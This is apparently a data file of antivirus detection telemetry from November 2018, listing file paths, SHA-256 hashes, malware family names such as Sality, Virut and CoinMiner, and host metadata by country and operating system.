  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-03-20-27.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T23:40:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grips_ra.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\grips_ra\\grips_ra.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-23-36-02.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-01T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T01:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204741-f754bd98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b74552d\\AVSCAN-20181102-204439-D7908571\\AVSCAN-20181102-204741-F754BD98', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='0303f6a8f595004c1d07d61cc3f7aad928b84be3d46c0aec7e6163ef718a34ce', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:47:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta vice city user files.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA Vice City User Files\\GTA Vice City User Files.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='39937865052cb558fe82b0851e6c2a2d094007dd9fdbbd4904c79cca4a4d95a6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:13:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183042-e7a545c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a82e24d\\AVSCAN-20181102-181849-686C7A54\\AVSCAN-20181102-183042-E7A545C8', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DAA06240E33F2A887308725EB0E802E8524F8F970270DFC7C6F2A981FE638A6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-02-10-10-59.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-28T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-02T09:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msqgzqxrj.exe', filepath='\\\\?\\C:\\ProgramData\\msqgzqxrj.exe', filesize=85568000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='3e2f914fe4c5cb80dc648a408389598a2df019aa98f70e1e9c91312759efa62a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='graphs.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\GRAPHS\\GRAPHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153041-feba91f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-153015-FA538386\\AVSCAN-20181102-153041-FEBA91F9', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5eb9b52bb5a2ecf3f0067d38b8af45fa144c3a1818a5c8a8a231da2a5014ae87.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\5EB9B52BB5A2ECF3F0067D38B8AF45FA144C3A1818A5C8A8A231DA2A5014AE87.VIR', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='5eb9b52bb5a2ecf3f0067d38b8af45fa144c3a1818a5c8a8a231da2a5014ae87', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:56:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5a1b721768a3c5807d56bf4148d1fd20447c2977706df01fda8951a774037e34', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-18\\5A1B721768A3C5807D56BF4148D1FD20447C2977706DF01FDA8951A774037E34', filesize=9824000, name='ADWARE/InstaMonst.KK.#M1.#R1'), hash='5a1b721768a3c5807d56bf4148d1fd20447c2977706df01fda8951a774037e34', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222440-b246904f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-222356-ABC2D34B\\AVSCAN-20181102-222440-B246904F', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\DOWNLOADS\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T19:38:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\204E36F43707C248631F69DF0EF15098FE5BF80B8282E386DB458B4876B96F3B', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:22:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T16:27:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191108-6dddc0f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77aa914e\\AVSCAN-20181102-191041-6B298E07\\AVSCAN-20181102-191108-6DDDC0F1', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wizinstaller.exe', filepath='D:\\FILE\\win10pro แผ่นมากับคอมฯ\\sources\\$OEM$\\$$\\System32\\asg\\WizInstaller\\x86\\WizInstaller.exe', filesize=256000, name='W32/Infector.Gen.#M300.#R7863'), hash='20e9c72a7b16d0a91543d9447db46379b3a9fe460e1cbb7174f1a242a3fbf86b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='temprec.exe', filepath='C:\\Users\\X\\Recorded TV\\TempRec\\TempRec.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194218-4f44bc84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194218-4F44BC84', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:42:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061939-3fe3edbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061939-3FE3EDBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122207-6f3c3309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122207-6F3C3309', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050738-30157654', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050738-30157654', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='62d7835ba92d38b165a02f6b16f881f7be7c6931fbda01a4ff38506bf7421a96', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120239-01a0162f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120239-01A0162F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051524-4604d065', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051524-4604D065', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061918-3352a827', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061918-3352A827', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204653-eeeb39bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b74552d\\AVSCAN-20181102-204439-D7908571\\AVSCAN-20181102-204653-EEEB39BF', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='4d5550b6882d918bde0c398d782e222dc87f01cadb9c8bc57fbd54b46074b7cb', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:47:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154532-4add4c1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154532-4ADD4C1A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:48:38Z'), dt=datetime.date(2018, 11, 2)),
